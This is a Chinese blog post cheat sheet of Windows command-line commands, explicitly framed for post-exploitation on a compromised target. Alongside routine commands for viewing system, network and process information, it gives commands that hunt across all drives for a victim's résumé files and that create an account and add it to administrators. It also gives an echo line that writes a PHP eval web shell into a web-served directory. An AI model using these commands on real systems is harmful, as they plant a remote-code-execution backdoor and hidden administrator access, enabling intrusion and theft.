0x00 前言
后渗透基础 – Windows常用命令 。如果知道目标存在某文件或者文件夹,又苦于不想一个一个的翻找,那么就试试 find + dir 命令吧。
0x01 全盘搜索命令
dir c:\ d:\ e:\ /s /b | find "简历.pdf"
搜索 C、D、E 盘下的文件名中带有 简历.pdf 的文件。
dir 显示目录中的文件和子目录列表。
/b 使用空格式 (没有标题信息或摘要)。
/s 显示指定目录和所有子目录中的文件。
0x02 系统用户相关
net user # 查询当前服务器所有的账户
net localgroup # 查看计算机用户组列表
net user username # 查询指定用户的具体信息
net user username password /add # 创建一个新的账户,注意,密码设置最好选择数字+字母+特殊符号。
net localgroup administrators cs /add
# administrators(想要提升到的用户组) cs(想要提升到指定用户组的账户)
net user user /del # 删除指定用户
quser # 查看当前服务器用户连接状态
logoff num # num指代标识符注销指定用户和服务器之间的连接,如果标识符为空,则注销当前连接,标识符可通过quser命令查看。
0x03 输入输出相关
echo 111111 # 输出显示111111
>> # 自动换行写入
> # 覆盖原内容写入
^ # 转义,原样特殊字符
ipconfig >> C:/1.txt # 将ipconfig的执行结果输出到C:/1.txt
echo ^<?php @eval($_POST['keefe']); ?^> >C:/AutoSet10/public_html/font.php # 输出一句话到/www/1.php
0x04 信息查看相关
systeminfo # 查看系统版本信息
netstat -ano # 查看系统开放端口
tasklist /svc # 查看系统进程
ipconfig # 查看ip地址
ipconfig /all #查看网络详细
whoami # 查看当前用户
0x05 进程端口相关
tasklist # 列出当前计算机运行的程序
taskkill /f /im xx.exe # 结束指定程序
taskkill /f /pid 111 # 结束pid为111的端口
转载请注明:Adminxe's Blog » 后渗透基础 – Windows常用命令